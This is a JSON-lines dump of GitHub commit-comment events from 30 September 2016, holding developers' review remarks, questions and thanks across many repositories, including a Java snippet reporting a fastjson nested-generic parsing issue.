{"id":"4641591403","type":"CommitCommentEvent","actor":{"login":"donkirkby"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19236594,"position":10,"line":8,"path":"charData/convert_to_json.py","commit_id":"e6fadba7136c5dba2fd4e21086aae16192768561","created_at":"2016-09-30T05:56:11Z","updated_at":"2016-09-30T05:56:11Z","body":"Not sure, I didn't try it. I think it would be, though, because it can't guess what the encoding of the file is."}},"created_at":"2016-09-30T05:56:11Z"}
{"id":"4641592153","type":"CommitCommentEvent","actor":{"login":"ykk2006"},"repo":{"name":"ykk2006/homework3"},"payload":{"comment":{"id":19236595,"position":null,"line":null,"path":null,"commit_id":"8bfa1c97a1ffba93bd90557632b2ccb76ed051e7","created_at":"2016-09-30T05:56:28Z","updated_at":"2016-09-30T05:56:28Z","body":"파일 수정"}},"created_at":"2016-09-30T05:56:28Z"}
{"id":"4641594979","type":"CommitCommentEvent","actor":{"login":"zyxue"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19236604,"position":10,"line":8,"path":"charData/convert_to_json.py","commit_id":"e6fadba7136c5dba2fd4e21086aae16192768561","created_at":"2016-09-30T05:57:32Z","updated_at":"2016-09-30T05:57:32Z","body":"OK, all I know is the default encoding is assumed to be ASCII in Python2 and Unicode in Python3. "}},"created_at":"2016-09-30T05:57:32Z"}
{"id":"4641595511","type":"CommitCommentEvent","actor":{"login":"JanMarvin"},"repo":{"name":"sjewo/readstata13"},"payload":{"comment":{"id":19236606,"position":null,"line":null,"path":null,"commit_id":"a59842ec105d36e9324a2db1ade11f9538564979","created_at":"2016-09-30T05:57:44Z","updated_at":"2016-09-30T05:57:44Z","body":"More or less a note to myself: I am wondering, why our test did not catch anything here. Is the character size not affected only the storage size or do we erase trailing whitespaces while reading?"}},"created_at":"2016-09-30T05:57:44Z"}
{"id":"4641598384","type":"CommitCommentEvent","actor":{"login":"garricko"},"repo":{"name":"Bachmann1234/java9_kernel"},"payload":{"comment":{"id":19236610,"position":null,"line":null,"path":null,"commit_id":"bbbbefc5dcd869148ed7f5577924d2ac0598ff72","created_at":"2016-09-30T05:58:50Z","updated_at":"2016-09-30T05:58:50Z","body":"Is there a link for the known-good kulla jar? The build server referenced later doesn't seem to keep the older versions, and the latest ones definitely don't work."}},"created_at":"2016-09-30T05:58:50Z"}
{"id":"4641600235","type":"CommitCommentEvent","actor":{"login":"ykk2006"},"repo":{"name":"ykk2006/homework3"},"payload":{"comment":{"id":19236613,"position":null,"line":null,"path":null,"commit_id":"fdd667d5802dd7eecc3e211630c5f96dfcf2b589","created_at":"2016-09-30T05:59:30Z","updated_at":"2016-09-30T05:59:30Z","body":"파일 수정"}},"created_at":"2016-09-30T05:59:30Z"}
{"id":"4641604035","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"substack/tape"},"payload":{"comment":{"id":19236647,"position":null,"line":null,"path":null,"commit_id":"c1b483c8c4d3f58677bacc106be13708dd73ef75","created_at":"2016-09-30T06:00:55Z","updated_at":"2016-09-30T06:00:55Z","body":"@dcousens sure, sorry about the delay. v4.6.1 published."}},"created_at":"2016-09-30T06:00:55Z"}
{"id":"4641604919","type":"CommitCommentEvent","actor":{"login":"russellladd"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19236648,"position":null,"line":null,"path":null,"commit_id":"9e41b36e8ff68dc71ae8c3a4ac5787974d4a1e2b","created_at":"2016-09-30T06:01:16Z","updated_at":"2016-09-30T06:01:16Z","body":"Amazing"}},"created_at":"2016-09-30T06:01:16Z"}
{"id":"4641610134","type":"CommitCommentEvent","actor":{"login":"htlim"},"repo":{"name":"protodef/agens-graph"},"payload":{"comment":{"id":19236669,"position":null,"line":null,"path":null,"commit_id":"a572eb4330d094e332c5abe956f18efca473ab5e","created_at":"2016-09-30T06:03:20Z","updated_at":"2016-09-30T06:03:20Z","body":"I reviewed, seems good to me.  :+1: "}},"created_at":"2016-09-30T06:03:20Z"}
{"id":"4641613042","type":"CommitCommentEvent","actor":{"login":"flammy"},"repo":{"name":"ffac/site"},"payload":{"comment":{"id":19236680,"position":null,"line":null,"path":null,"commit_id":"3421cde9b7b662db20342709ad1d2f7e92dcc0ff","created_at":"2016-09-30T06:04:25Z","updated_at":"2016-09-30T06:04:25Z","body":"Ich bin für diese Änderung.\r\n\r\nKein Mensch weiß was da wirklich reingehört (Stockwerk, Höhe über NN ...).\r\n\r\nMenschen die nicht ständig im Forum unterwegs sind und sowas das erste mal einrichten können damit eh nichts anfangen.\r\n"}},"created_at":"2016-09-30T06:04:25Z"}
{"id":"4641613771","type":"CommitCommentEvent","actor":{"login":"jessicachoy"},"repo":{"name":"jessicachoy/testing"},"payload":{"comment":{"id":19236685,"position":5,"line":5,"path":"html","commit_id":"4dfe9c74102e66a1ffb6571c2485703510715561","created_at":"2016-09-30T06:04:43Z","updated_at":"2016-09-30T06:04:43Z","body":"comment"}},"created_at":"2016-09-30T06:04:43Z"}
{"id":"4641614287","type":"CommitCommentEvent","actor":{"login":"jessicachoy"},"repo":{"name":"jessicachoy/testing"},"payload":{"comment":{"id":19236691,"position":8,"line":8,"path":"html","commit_id":"4dfe9c74102e66a1ffb6571c2485703510715561","created_at":"2016-09-30T06:04:55Z","updated_at":"2016-09-30T06:04:55Z","body":"another comment"}},"created_at":"2016-09-30T06:04:55Z"}
{"id":"4641618794","type":"CommitCommentEvent","actor":{"login":"smadha"},"repo":{"name":"smadha/sparkler"},"payload":{"comment":{"id":19236696,"position":8,"line":42,"path":"sparkler-plugins/fetcher-jbrowser/src/main/java/edu/usc/irds/sparkler/plugin/FetcherJBrowserActivator.java","commit_id":"e4e3fdaa701557370932a2199f2fd656082fcce1","created_at":"2016-09-30T06:06:32Z","updated_at":"2016-09-30T06:06:32Z","body":"Thanks for these fixes :)"}},"created_at":"2016-09-30T06:06:32Z"}
{"id":"4641619523","type":"CommitCommentEvent","actor":{"login":"htlim"},"repo":{"name":"protodef/agens-graph"},"payload":{"comment":{"id":19236699,"position":76,"line":1723,"path":"src/backend/tcop/pquery.c","commit_id":"a572eb4330d094e332c5abe956f18efca473ab5e","created_at":"2016-09-30T06:06:45Z","updated_at":"2016-09-30T06:06:45Z","body":"In my opinion, \"CREATE VERTEX\" is more intuitive than \"INSERT VERTEX\"."}},"created_at":"2016-09-30T06:06:45Z"}
{"id":"4641620547","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19236701,"position":15,"line":159,"path":"application/controllers/AdminController.php","commit_id":"a562549ee8d155004dfc0ad4bbffe79928fe5cc4","created_at":"2016-09-30T06:07:09Z","updated_at":"2016-09-30T06:07:09Z","body":"PS : because i'm tired to add a Yii::import for an helper with static function : i add ls\\\\helpers , then `\\ls\\helpers\\AjaxHelper::outputNotLoggedIn()` can do it (more clearly i think). Maybe not the best way, but functionnal way ;) ."}},"created_at":"2016-09-30T06:07:09Z"}
{"id":"4641621416","type":"CommitCommentEvent","actor":{"login":"flammy"},"repo":{"name":"ffac/site"},"payload":{"comment":{"id":19236704,"position":null,"line":null,"path":null,"commit_id":"273a6707b44e8b6720dbefee8ec2e14d3c2e3fc8","created_at":"2016-09-30T06:07:27Z","updated_at":"2016-09-30T06:07:27Z","body":"Ich bin da ziemlich zwiegespalten.\r\n\r\nKannst du bewerten ob da auch viel Müll drin steht? \r\n\r\nAn sich finde ich die Information Nützlich und wir haben das bisher auch schon öfters gebraucht um Menschen anzuschreiben, die Murks gemacht haben."}},"created_at":"2016-09-30T06:07:27Z"}
{"id":"4641621686","type":"CommitCommentEvent","actor":{"login":"mauryat"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":19236705,"position":null,"line":null,"path":null,"commit_id":"616aa5c371f6f84e64e2f4fd0cf382c620314508","created_at":"2016-09-30T06:07:32Z","updated_at":"2016-09-30T06:07:32Z","body":"Oh wow! Always wondered why it was showing C instead of swift."}},"created_at":"2016-09-30T06:07:32Z"}
{"id":"4641629084","type":"CommitCommentEvent","actor":{"login":"nico7171"},"repo":{"name":"nico7171/hello-world"},"payload":{"comment":{"id":19236712,"position":null,"line":null,"path":null,"commit_id":"8500d50fe152f1c6effa3d4184a89de3b8739844","created_at":"2016-09-30T06:10:02Z","updated_at":"2016-09-30T06:10:02Z","body":"this is my first GIT doc"}},"created_at":"2016-09-30T06:10:02Z"}
{"id":"4641630603","type":"CommitCommentEvent","actor":{"login":"K-Phoen"},"repo":{"name":"K-Phoen/python-fitparse"},"payload":{"comment":{"id":19236713,"position":null,"line":null,"path":null,"commit_id":"601301520ece724330c2d1d722a758393ebf80c4","created_at":"2016-09-30T06:10:33Z","updated_at":"2016-09-30T06:10:33Z","body":"This repository is just a fork, and as such it's not available on pip.\r\n\r\nIn fact, I don't really maintain this anymore :("}},"created_at":"2016-09-30T06:10:33Z"}
{"id":"4641638094","type":"CommitCommentEvent","actor":{"login":"zosrothko"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19236722,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-30T06:13:17Z","updated_at":"2016-09-30T06:13:17Z","body":"Because CMake is not the main build tool used. GNU Make stays for now the mainstream packaging tool on Linux and msbuild/devenv/VisualStudio on Windows"}},"created_at":"2016-09-30T06:13:17Z"}
{"id":"4641638656","type":"CommitCommentEvent","actor":{"login":"SonalOjha"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19236724,"position":13,"line":127,"path":"cloudformation/iam_federation.js","commit_id":"3f45772ffdab32c3fa3ab4ca58402c655d5284c0","created_at":"2016-09-30T06:13:30Z","updated_at":"2016-09-30T06:13:30Z","body":"Have handled that"}},"created_at":"2016-09-30T06:13:30Z"}
{"id":"4641639194","type":"CommitCommentEvent","actor":{"login":"shahid7109"},"repo":{"name":"imiuka/rtmp-sharp"},"payload":{"comment":{"id":19236726,"position":null,"line":null,"path":null,"commit_id":"4bae17c59222c463f50d258a364806844dadeaf5","created_at":"2016-09-30T06:13:40Z","updated_at":"2016-09-30T06:13:40Z","body":"Hello,\r\nCan You Give me solution for Facebook Live video Streaming using RTMP-sharp library"}},"created_at":"2016-09-30T06:13:40Z"}
{"id":"4641640103","type":"CommitCommentEvent","actor":{"login":"jagannadhasrikar"},"repo":{"name":"jagannadhasrikar/hubdemo"},"payload":{"comment":{"id":19236728,"position":null,"line":null,"path":null,"commit_id":"132964ac6c1e8c2000af186c2fb122176c3ccf2f","created_at":"2016-09-30T06:14:01Z","updated_at":"2016-09-30T06:14:01Z","body":"just a new line for a new branch"}},"created_at":"2016-09-30T06:14:01Z"}
{"id":"4641643638","type":"CommitCommentEvent","actor":{"login":"nicolas-raoul"},"repo":{"name":"aegif/NemakiWare"},"payload":{"comment":{"id":19236734,"position":29,"line":75,"path":"core/src/main/java/jp/aegif/nemaki/rest/UserItemResource.java","commit_id":"c179c84a7d8a145b8adb8f94ee8d6c40a7df98fe","created_at":"2016-09-30T06:15:20Z","updated_at":"2016-09-30T06:15:20Z","body":"@sixpetals: What is this for? It prevents compilation in Eclipse."}},"created_at":"2016-09-30T06:15:20Z"}
{"id":"4641657796","type":"CommitCommentEvent","actor":{"login":"mimi1vx"},"repo":{"name":"richiejp/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":19236755,"position":null,"line":null,"path":null,"commit_id":"5615c8298db8203ea0ca4c237e10891b20d2db52","created_at":"2016-09-30T06:19:43Z","updated_at":"2016-09-30T06:19:43Z","body":"https://github.com/richiejp/os-autoinst-distri-opensuse/blob/ltppoc/tests/kernel/virtio_console_lib.pm#L95 -- wrong , SLE12SPx and openSUSE:Leap has perl-5.18 this can broke on production instance of openqa"}},"created_at":"2016-09-30T06:19:43Z"}
{"id":"4641658418","type":"CommitCommentEvent","actor":{"login":"goffrie"},"repo":{"name":"rust-lang/rustup.sh"},"payload":{"comment":{"id":19236758,"position":null,"line":null,"path":null,"commit_id":"5059e4e7f74e955d65b63d7f0652a88af8c9cfae","created_at":"2016-09-30T06:19:56Z","updated_at":"2016-09-30T06:19:56Z","body":"This breaks all the people who use Travis with sudo: false (and Travis squelches stderr, so they can't even see this message). Also it contradicts https://github.com/rust-lang/rustup.sh/commit/5059e4e7f74e955d65b63d7f0652a88af8c9cfae#diff-f5bdfd1a5f7e675447e2f1a86ab3bf72R573 :("}},"created_at":"2016-09-30T06:19:56Z"}
{"id":"4641662777","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19236767,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-30T06:21:15Z","updated_at":"2016-09-30T06:21:15Z","body":"I fixed the 2 urls yesterday evening, given you were ok for the change.\r\nI don't think the \"features\" qualifier on the maven artifact has any impact, but I may be wrong.\r\nBut for coherence, I agree it would be better to change it, it should not really matter though."}},"created_at":"2016-09-30T06:21:15Z"}
{"id":"4641663743","type":"CommitCommentEvent","actor":{"login":"kamena"},"repo":{"name":"kamena/budget-analyzer"},"payload":{"comment":{"id":19236770,"position":6,"line":202,"path":"WebContent/scripts/budgetAnalyzer.js","commit_id":"bee87033b96319f7fed5b7ed629f491ceb4e142f","created_at":"2016-09-30T06:21:30Z","updated_at":"2016-09-30T06:21:30Z","body":"Function increaseTotalMoney"}},"created_at":"2016-09-30T06:21:30Z"}
{"id":"4641664495","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19236772,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T06:21:42Z","updated_at":"2016-09-30T06:21:42Z","body":"ok, tks dreamed, i'll try again."}},"created_at":"2016-09-30T06:21:42Z"}
{"id":"4641670966","type":"CommitCommentEvent","actor":{"login":"pitr-ch"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19236783,"position":12,"line":41,"path":"truffle/src/main/java/org/jruby/truffle/language/globals/GlobalVariables.java","commit_id":"8842dec1470a55f0b1169efd76840ddff3654923","created_at":"2016-09-30T06:23:51Z","updated_at":"2016-09-30T06:23:51Z","body":"@eregon I thought we should avoid lambdas, or are they fine behind boundary?"}},"created_at":"2016-09-30T06:23:51Z"}
{"id":"4641673706","type":"CommitCommentEvent","actor":{"login":"Seluj78"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19236787,"position":12,"line":0,"path":"sources/main.c","commit_id":"f492effe91d2dc30b54d4aef5cda425f77ebbaa8","created_at":"2016-09-30T06:24:44Z","updated_at":"2016-09-30T06:24:44Z","body":"It's a random syntax, definetly not working\n\nLe 30 sept. 2016 07:35, \"NuclearCoder\" <notifications@github.com> a écrit :\n\nWhat is that syntax? I've never seen that before :o\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub\n<https://github.com/Seluj78/General-C-Compiler/commit/f492effe91d2dc30b54d4aef5cda425f77ebbaa8#commitcomment-19236467>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/AEbSJUf2T5FYBwIPx2Ul_vVHy09qaYUIks5qvJ-jgaJpZM4KKuvS>\n.\n"}},"created_at":"2016-09-30T06:24:44Z"}
{"id":"4641677047","type":"CommitCommentEvent","actor":{"login":"jamesworr"},"repo":{"name":"hngenc/drone"},"payload":{"comment":{"id":19236795,"position":null,"line":null,"path":null,"commit_id":"8bfa35a050ae244d790f103cf43b169b4ae2627b","created_at":"2016-09-30T06:25:52Z","updated_at":"2016-09-30T06:25:52Z","body":"Moved hovering code into a function.  "}},"created_at":"2016-09-30T06:25:52Z"}
{"id":"4641679071","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"substack/tape"},"payload":{"comment":{"id":19236800,"position":null,"line":null,"path":null,"commit_id":"c1b483c8c4d3f58677bacc106be13708dd73ef75","created_at":"2016-09-30T06:26:30Z","updated_at":"2016-09-30T06:26:30Z","body":"Thanks @ljharb!"}},"created_at":"2016-09-30T06:26:30Z"}
{"id":"4641680742","type":"CommitCommentEvent","actor":{"login":"Demfier"},"repo":{"name":"metakgp/scripts"},"payload":{"comment":{"id":19236811,"position":null,"line":null,"path":null,"commit_id":"37e2a29808612f20e4a8d03c7d05da6e66a393e4","created_at":"2016-09-30T06:27:06Z","updated_at":"2016-09-30T06:27:06Z","body":"@icyflame Thank you for the appreciation and really sorry for the current inactiveness. Just have some things to finish upon.\r\nSee [this](https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings) to know more about the `Insercure Platform Warnings` that is included in the script.\r\n\r\nFinally, I appreciate your enhancements in the script. Thank you very much for that.\r\n"}},"created_at":"2016-09-30T06:27:06Z"}
{"id":"4641684924","type":"CommitCommentEvent","actor":{"login":"thejayyadav"},"repo":{"name":"csendre/android_device_samsung_serranodsdd"},"payload":{"comment":{"id":19236818,"position":null,"line":null,"path":null,"commit_id":"61a9988913aee02fd993fabe9a9b9149f5c1a442","created_at":"2016-09-30T06:28:29Z","updated_at":"2016-09-30T06:28:29Z","body":"Is cm14 posted to https://www.androidfilehost.com/?w=files&flid=112083 working?"}},"created_at":"2016-09-30T06:28:29Z"}
{"id":"4641685782","type":"CommitCommentEvent","actor":{"login":"aschempp"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":19236823,"position":22,"line":416,"path":"src/Resources/contao/themes/flexible/src/main.css","commit_id":"0a77ede3ed29aa471820663f26beff4430083828","created_at":"2016-09-30T06:28:48Z","updated_at":"2016-09-30T06:28:48Z","body":"This change is causing issues on my screen as it overrides https://github.com/contao/core-bundle/blob/master/src/Resources/contao/themes/flexible/src/main.css#L1695. Maybe change to `.popup .tl_listing:not(table)` ?"}},"created_at":"2016-09-30T06:28:48Z"}
{"id":"4641687070","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19236830,"position":15,"line":22,"path":"Week4/ahmed/Exercise2.hs","commit_id":"978c8000ad9aa5875db8cc4a70bf956726b47b58","created_at":"2016-09-30T06:29:12Z","updated_at":"2016-09-30T06:29:12Z","body":"I think you can work out the type by now.\r\n\r\nRemember: the basics of Monads is all about unpacking and repacking the values before leaving the function again!"}},"created_at":"2016-09-30T06:29:12Z"}
{"id":"4641688263","type":"CommitCommentEvent","actor":{"login":"xuyaqiang"},"repo":{"name":"alibaba/fastjson"},"payload":{"comment":{"id":19236836,"position":null,"line":null,"path":null,"commit_id":"70bf0c4c7e41876b05320c1c4ea0f8d9b7e2ea23","created_at":"2016-09-30T06:29:37Z","updated_at":"2016-09-30T06:29:37Z","body":"public class App \r\n{\r\n    public static void main( String[] args ) throws IOException\r\n    {\r\n        String str1=\"{\\n\" +\r\n                \"      \\\"matches\\\":77085,\\n\" +\r\n                \"      \\\"groups\\\":[{\\n\" +\r\n                \"          \\\"groupValue\\\":1,\\n\" +\r\n                \"          \\\"doclist\\\":{\\\"numFound\\\":8945,\\\"start\\\":0,\\\"docs\\\":[\\n\" +\r\n                \"              {\\n\" +\r\n                \"                \\\"id\\\":3157808,\\n\" +\r\n                \"                \\\"title\\\":\\\"朗境 2014款 1.6L 自动型\\\",\\n\" +\r\n                \"                \\\"provid\\\":540000,\\n\" +\r\n                \"                \\\"cityid\\\":542200}]\\n\" +\r\n                \"          }},\\n\" +\r\n                \"        {\\n\" +\r\n                \"          \\\"groupValue\\\":15,\\n\" +\r\n                \"          \\\"doclist\\\":{\\\"numFound\\\":2894,\\\"start\\\":0,\\\"docs\\\":[\\n\" +\r\n                \"              {\\n\" +\r\n                \"                \\\"id\\\":3157809,\\n\" +\r\n                \"                \\\"title\\\":\\\"宝马4系 2014款 428i xDrive风尚设计套装\\\",\\n\" +\r\n                \"                \\\"provid\\\":540000,\\n\" +\r\n                \"                \\\"cityid\\\":540100}]\\n\" +\r\n                \"          }}]}\";\r\n\r\n        String str2=\"{\\n\" +\r\n                \"      \\\"matches\\\":51030,\\n\" +\r\n                \"      \\\"groups\\\":[{\\n\" +\r\n                \"          \\\"groupValue\\\":3864,\\n\" +\r\n                \"          \\\"doclist\\\":{\\\"numFound\\\":35,\\\"start\\\":0,\\\"docs\\\":[\\n\" +\r\n                \"              {\\n\" +\r\n                \"                \\\"keyword\\\":\\\"330000_RALLY FIGHTER\\\",\\n\" +\r\n                \"                \\\"typetag\\\":2}]\\n\" +\r\n                \"          }},\\n\" +\r\n                \"        {\\n\" +\r\n                \"          \\\"groupValue\\\":813,\\n\" +\r\n                \"          \\\"doclist\\\":{\\\"numFound\\\":35,\\\"start\\\":0,\\\"docs\\\":[\\n\" +\r\n                \"              {\\n\" +\r\n                \"                \\\"keyword\\\":\\\"330000_起亚 福瑞迪\\\",\\n\" +\r\n                \"                \\\"typetag\\\":2}]\\n\" +\r\n                \"          }}]}\";\r\n\r\n        String str3=\"{\\n\" +\r\n                \"          \\\"groupValue\\\":1,\\n\" +\r\n                \"          \\\"doclist\\\":{\\\"numFound\\\":8945,\\\"start\\\":0,\\\"docs\\\":[\\n\" +\r\n                \"              {\\n\" +\r\n                \"                \\\"id\\\":3157808,\\n\" +\r\n                \"                \\\"title\\\":\\\"朗境 2014款 1.6L 自动型\\\",\\n\" +\r\n                \"                \\\"provid\\\":540000,\\n\" +\r\n                \"                \\\"cityid\\\":542200}]\\n\" +\r\n                \"          }}\";\r\n\r\n        String str4=\"{\\n\" +\r\n                \"          \\\"groupValue\\\":3864,\\n\" +\r\n                \"          \\\"doclist\\\":{\\\"numFound\\\":35,\\\"start\\\":0,\\\"docs\\\":[\\n\" +\r\n                \"              {\\n\" +\r\n                \"                \\\"keyword\\\":\\\"330000_RALLY FIGHTER\\\",\\n\" +\r\n                \"                \\\"typetag\\\":2}]\\n\" +\r\n                \"          }}\";\r\n\r\n\t// 嵌套两层可以解析\r\n        Group<Doc1> test3=JSON.parseObject(str3,new TypeReference<Group<Doc1>>(){});\r\n        Group<Doc2> test4=JSON.parseObject(str4,new TypeReference<Group<Doc2>>(){});\r\n\r\n        // 嵌套三层无法解析\r\n        //Result<Doc1> test1=JSON.parseObject(str1,new TypeReference<Result<Doc1>>(){});\r\n        //Result<Doc2> test2=JSON.parseObject(str2,new TypeReference<Result<Doc2>>(){});\t        \r\n    }\r\n}\r\n\r\nclass Doc1\r\n{\r\n    private int id;\r\n    private String title;\r\n\r\n    public int getId() {\r\n        return id;\r\n    }\r\n\r\n    public void setId(int id) {\r\n        this.id = id;\r\n    }\r\n\r\n    public String getTitle() {\r\n        return title;\r\n    }\r\n\r\n    public void setTitle(String title) {\r\n        this.title = title;\r\n    }\r\n}\r\n\r\nclass Doc2\r\n{\r\n    private String keyword;\r\n    private int typetag;\r\n\r\n    public String getKeyword() {\r\n        return keyword;\r\n    }\r\n\r\n    public void setKeyword(String keyword) {\r\n        this.keyword = keyword;\r\n    }\r\n\r\n    public int getTypetag() {\r\n        return typetag;\r\n    }\r\n\r\n    public void setTypetag(int cid) {\r\n        this.typetag = typetag;\r\n    }\r\n}\r\n\r\nclass Docs<T>\r\n{\r\n    private int numFound;\r\n    private int start;\r\n    private T[] docs;\r\n\r\n    public int getNumFound() {\r\n        return numFound;\r\n    }\r\n\r\n    public void setNumFound(int numFound) {\r\n        this.numFound = numFound;\r\n    }\r\n\r\n    public int getStart() {\r\n        return start;\r\n    }\r\n\r\n    public void setStart(int start) {\r\n        this.start = start;\r\n    }\r\n\r\n    public T[] getDocs() {\r\n        return docs;\r\n    }\r\n\r\n    public void setDocs(T[] docs) {\r\n        this.docs = docs;\r\n    }\r\n}\r\n\r\nclass Group<T>\r\n{\r\n    private int groupValue;\r\n    private Docs<T> doclist;\r\n\r\n    public int getGroupValue() {\r\n        return groupValue;\r\n    }\r\n\r\n    public void setGroupValue(int groupValue) {\r\n        this.groupValue = groupValue;\r\n    }\r\n\r\n    public Docs<T> getDoclist() {\r\n        return doclist;\r\n    }\r\n\r\n    public void setDoclist(Docs<T> doclist) {\r\n        this.doclist = doclist;\r\n    }\r\n}\r\n\r\nclass Result<T>\r\n{\r\n    private int matches;\r\n    private Group<T>[] groups;\r\n\r\n    public int getMatches() {\r\n        return matches;\r\n    }\r\n\r\n    public void setMatches(int matches) {\r\n        this.matches = matches;\r\n    }\r\n\r\n    public void setGroups(Group<T>[] groups) {\r\n        this.groups = groups;\r\n    }\r\n\r\n    public Group<T>[] getGroups() {\r\n        return groups;\r\n    }\r\n}"}},"created_at":"2016-09-30T06:29:37Z"}
{"id":"4641693937","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"substack/tape"},"payload":{"comment":{"id":19236847,"position":null,"line":null,"path":null,"commit_id":"c1b483c8c4d3f58677bacc106be13708dd73ef75","created_at":"2016-09-30T06:31:29Z","updated_at":"2016-09-30T06:31:29Z","body":"@ljharb the effect is real... tests that took >20seconds now take 1-2 seconds!  Thanks @ljharb and yay for strict mode"}},"created_at":"2016-09-30T06:31:29Z"}
{"id":"4641697899","type":"CommitCommentEvent","actor":{"login":"sdmunozsierra"},"repo":{"name":"sdmunozsierra/activifit"},"payload":{"comment":{"id":19236855,"position":null,"line":null,"path":null,"commit_id":"d08642fa7a146289d9f0f50f3a120155f88158d1","created_at":"2016-09-30T06:32:46Z","updated_at":"2016-09-30T06:32:46Z","body":"* list\r\n* list"}},"created_at":"2016-09-30T06:32:46Z"}
{"id":"4641698398","type":"CommitCommentEvent","actor":{"login":"wangweijun120"},"repo":{"name":"wangweijun120/Hello-world"},"payload":{"comment":{"id":19236856,"position":null,"line":null,"path":null,"commit_id":"6e3dff6d206455d7cba20cac995302d64ef9e6ae","created_at":"2016-09-30T06:32:57Z","updated_at":"2016-09-30T06:32:57Z","body":"不错"}},"created_at":"2016-09-30T06:32:57Z"}
{"id":"4641699899","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"pfefferle/wordpress-webmention"},"payload":{"comment":{"id":19236861,"position":null,"line":null,"path":null,"commit_id":"ec114c6592f5ed3b9ce32ca9403c770d36c88bdf","created_at":"2016-09-30T06:33:27Z","updated_at":"2016-09-30T06:33:27Z","body":"oops"}},"created_at":"2016-09-30T06:33:27Z"}
{"id":"4641703528","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19236868,"position":143,"line":114,"path":"Triangle1/Program.cs","commit_id":"02d53f1922564aad2980486f4b924c9d2089b189","created_at":"2016-09-30T06:34:42Z","updated_at":"2016-09-30T06:34:42Z","body":"\"Payment\" - это платеж, расчет в финансовом плане"}},"created_at":"2016-09-30T06:34:42Z"}
{"id":"4641706538","type":"CommitCommentEvent","actor":{"login":"KellyFrederick"},"repo":{"name":"KellyFrederick/Thermonuclear-Fusion"},"payload":{"comment":{"id":19236874,"position":null,"line":null,"path":null,"commit_id":"b7a91f31cb72eb2fad1864edb9ad18a52db62f05","created_at":"2016-09-30T06:35:44Z","updated_at":"2016-09-30T06:35:44Z","body":"I am not sure I did this right."}},"created_at":"2016-09-30T06:35:44Z"}
{"id":"4641707580","type":"CommitCommentEvent","actor":{"login":"kares"},"repo":{"name":"headius/jruby"},"payload":{"comment":{"id":19236883,"position":null,"line":null,"path":null,"commit_id":"863ea1d01367a4df7bec7d61189786b3b28de3d5","created_at":"2016-09-30T06:36:05Z","updated_at":"2016-09-30T06:36:05Z","body":"yep, thanks!"}},"created_at":"2016-09-30T06:36:05Z"}
{"id":"4641708326","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19236884,"position":129,"line":103,"path":"Triangle1/Program.cs","commit_id":"02d53f1922564aad2980486f4b924c9d2089b189","created_at":"2016-09-30T06:36:20Z","updated_at":"2016-09-30T06:36:20Z","body":"Вы сбрасываете треугольник в ноль, если введены не верные данные так?\r\nПравильнее будет сообщать пользователю вашего класса (тому кто треугльник создает), что он совершил ошибку, например с помощью ArgumentException"}},"created_at":"2016-09-30T06:36:20Z"}
{"id":"4641711564","type":"CommitCommentEvent","actor":{"login":"acidjazz"},"repo":{"name":"acidjazz/basal"},"payload":{"comment":{"id":19236892,"position":null,"line":null,"path":null,"commit_id":"35b456bf803e9cca1dfc76cead5d09c732d171ac","created_at":"2016-09-30T06:37:23Z","updated_at":"2016-09-30T06:37:23Z","body":"![upload](https://cloud.githubusercontent.com/assets/967369/18982798/9f05da1a-869d-11e6-92cf-7608b033a4da.gif)\r\n"}},"created_at":"2016-09-30T06:37:23Z"}
{"id":"4641713342","type":"CommitCommentEvent","actor":{"login":"Vitaliy-1"},"repo":{"name":"asmecher/ojs"},"payload":{"comment":{"id":19236898,"position":null,"line":null,"path":null,"commit_id":"6d71e21dbd64c6d5db5cb382caa33d139b95bf3b","created_at":"2016-09-30T06:37:55Z","updated_at":"2016-09-30T06:37:55Z","body":"Hmm. Current all metadata are language specific (DC.Source, DC.Rights, DC.Type.articleType, citation_journal_title etc), not only DC.Title. xml:lang attribute has only DC.Description and DC.Title.Alternative\r\nBut I don`t see a problem here. Or I am mistaken and this could cause problems in indexing?\r\nSpecially for me indexing on English metatags is more preferable even when article body is on another language.  \r\n"}},"created_at":"2016-09-30T06:37:55Z"}
